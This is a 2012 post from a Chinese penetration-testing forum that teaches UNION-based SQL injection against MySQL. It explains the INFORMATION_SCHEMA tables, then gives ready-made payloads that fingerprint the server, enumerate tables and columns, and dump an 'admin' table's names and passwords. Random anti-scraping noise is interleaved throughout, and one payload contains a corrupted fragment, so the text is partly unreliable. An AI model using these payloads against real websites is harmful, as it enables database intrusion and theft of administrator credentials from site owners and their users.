中国网络渗透测试联盟
标题:
mysql常规注入
[打印本页]
作者:
admin
时间:
2012-9-13 17:48
标题:
mysql常规注入
本文介绍MYSQL盲注的一些语句和方法
h1 o% X1 D9 D9 v8 F/ l3 z
8 q- B P) ^% `
学习盲注前先了解下 IFORMATION_SCHEMA 库
( r/ B1 ?5 {, v8 Q" w& `6 V/ I
: p2 \1 h8 z A, J) }. K- n
Mysql5内置的系统数据库IFORMATION_SCHEMA,其结构如MSSQL中的master数据库,其中记录了Mysql中所有
9 u9 H4 o% Q+ d% ~( E
存在数据库名、数据库表、表字段。重点要求研究几个对SQL注入有用的数据表说明。
! X: b! W U: T" A9 p0 h
1.得到所有数据库名:
, f$ m0 }, O( u0 R6 H v, u
|SCHEMATA ->存储数据库名的表
( }6 h% r' F0 t' U/ x/ T7 K! I1 X; n
|---字段:SCHEMA_NAME ->数据库名称
4 y# @# G$ B1 _2 {' q
5 K. Z- ]6 g' [
|TABLES ->存储表名
% Z' l% Z8 {! _5 P7 j( N
|---字段:TABLE_SCHEMA ->表示该表名属于哪个数据库名
) d$ a- E) m) X$ T. {8 d
|---字段:TABLE_NAME ->存储表的表名
) ~5 c3 G- ?9 z! [# }3 E
0 c. w- G4 ?3 J5 T3 k* a2 `% m
|COLUMNS ->存储的字段名表
0 [% b, ~0 ?, a( j& L$ e
|---字段:TABLE_SCHEMA ->该字段所属数据库名
6 \5 W2 x" E5 n) G# n
|---字段:TABLE_NAME ->存储所属表的名称
# J/ N& y9 y k& D' H1 U; O
& x# r; o/ b) z6 T" B1 }
|---字段:COLUMN_NAME ->该字段的名称
: g# k5 T, S0 R0 j8 A( m4 z# `' B
' S/ g) q) G& h7 l
+ {3 n" `4 R- n/ g! J' N4 p1 g
- G2 r6 C* b/ W( m2 w# s
###########################################################################
- M2 h! S; o! q% d- m" S3 \/ h
# v% r* l; r+ \
0x001 获取系统信息:
2 Y2 A' a* O5 I- U [
% w; W4 ~$ ?9 D7 T
union select 1,2,3,4,5,concat(@@global.version_compile_os,0x3c62723e,@@datadir,0x3c62723e,user(),0x3c62723e,version()da?tabase(),0x3c62723e,database()),7,8,9 /*
" u8 A' C. P- f! L. e1 A& Y
7 F: Z3 s8 m9 V
/*
0 e- e4 f3 K# a2 n* I% l0 A0 o8 B
( m% ` [% ?4 j9 V c
@@global.version_compile_os 获取系统版本
3 d8 h; k5 g1 `8 i; | r5 a% k3 x
5 V+ k9 w, Q. i
@@datadir 数据库路径
( m6 J& t P3 ?, L* k0 B
database() 当前数据库名称
5 u0 N. H' x2 |3 a4 p. ^* @
0x3c62723e 换行HEX值
0 b5 d" ^) r7 m: k3 D, W
) i) p6 }7 g* l& g, z
*/
# q7 ~! ^7 ?8 `3 Y$ a) Y& j/ r. {$ S5 w
$ c9 v6 w5 K- I7 b7 B4 I: h4 x
: {& B# B& S" @% [0 X0 }
' g0 R4 T' Y' p( }# _
######################################################################
1 z5 d; `6 E. T9 g( E
+ N5 N7 s" k) w( E$ `
0x002 获取表名
$ H: e8 d- F9 T1 {/ B' H1 w4 C
- D z) `0 b: t) { D" r
union select 1,2,group_concat(table_name),4,5,6,7,8,9 from information_schema.tables where table_schema=0x67617264656e /*
$ Y/ j. M. {0 ]& C' d* p/ j
4 F8 v6 i. m3 b Q6 ?$ i
* V) K1 h! x2 R* _3 [6 q
$ Y# t, |2 V& \& g& R) {
/*
. w, M( K8 l3 l+ @) t
{: y4 i+ U& H
0x67617264656e 为当前数据库名
+ p0 c j2 y% t/ J+ n) e
( k0 n) M2 v: Q/ N
group_concat(table_name) 使用group_concat函数 一步获得该库所有表名
( l( x* U" D; U, J) _
2 U9 L5 p ^* k, m" i: l0 a
*/
$ V2 n& j) h+ |4 F2 Q1 E
4 H' L: J- m# D: p
######################################################################
+ ?, x! c0 M, ~2 L' y$ T% Q
4 D7 Z4 z! M; Q# q
3 U# f9 l' E# N5 N8 }
# {& o2 L& n1 D9 g& C% E
0x003 获取字段
; H' u6 ^: r- f
: m5 Y* O5 P6 a; Q
union select 1,2,group_concat(column_name),4,5,6,7,8,9 from information_schema.columns where table_name=0x61646d696e and table_schema=0x67617264656e limit 1 /*
) M( B3 \" v# q2 W1 Y
: Y% i# q# g+ G; Z' j% U
/*
. t( ^/ O( a2 y7 H2 f
: |6 j ~, F, C
group_concat(column_name) 同样是 一口气 获得该表(0x61646d696e)所有字段
* O* x( {. y* F
8 c _) w+ x& H1 V9 ^- J* r$ f) c
0x61646d696e ->选择一个表
4 R( T9 T; \ R, \7 B6 g
" S2 P3 ~2 U3 E, Q4 q6 U5 F9 j
0x67617264656e ->数据库名
0 ^0 L) m7 U, X3 R) k, x- T
* O1 _! a8 ^0 u
*/
, d* g; D8 E: g. c
0 p, N. y' X4 {6 H5 k
#####################################################################
+ v$ S1 l4 j4 }' C2 Q
; ~9 K. C% l: V2 i$ r
% L* h; C; T7 E4 G! L. U! q
4 M- _1 M$ W* F5 U: k2 d* Q) q6 y8 K, Y
0x004 获取数据
! P/ Q3 @( G+ v$ a
" G# \) E7 R) \" e
union select 1,2,3
0 G$ G2 ~& {9 A" W
,4,5,concat(id,0x3c62723e,adname,0x3c62723e,adpassword),6,7,8 from admin
2 J0 \1 F5 e/ ^( z% V
' G7 p6 S. K8 K1 i7 k0 q+ F" z) a" i
union select 1,group_concat(id),group_concat(adname),4,5,group_concat(adpassword),6,7,8 from admin
' ?- _7 D9 A! M, h3 D4 O$ z' V
/ r6 m1 z7 |. ~1 C3 l
0 d# X( G& ]* [$ [+ w! f4 c
+ b" j7 B1 P. f/ b2 ?7 A
/*
+ C/ r6 W6 Q9 h
( i3 B5 A& J6 a" w2 ~( Z8 G- D
0x3c62723e 换行符号HEX编码
1 z" O: o6 V( T2 o2 F! `8 E( X& D
8 x/ @7 {6 E% B5 m
group_concat 同时获得该字段所有数据
1 f8 ^+ V/ ?: g U; g+ w. `, h
; ^4 e5 n1 K" o+ k
*/
: R' p9 M. q+ \8 O: V ^) B/ Z& t
1 B3 p( L* }4 E7 N9 y i7 l
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2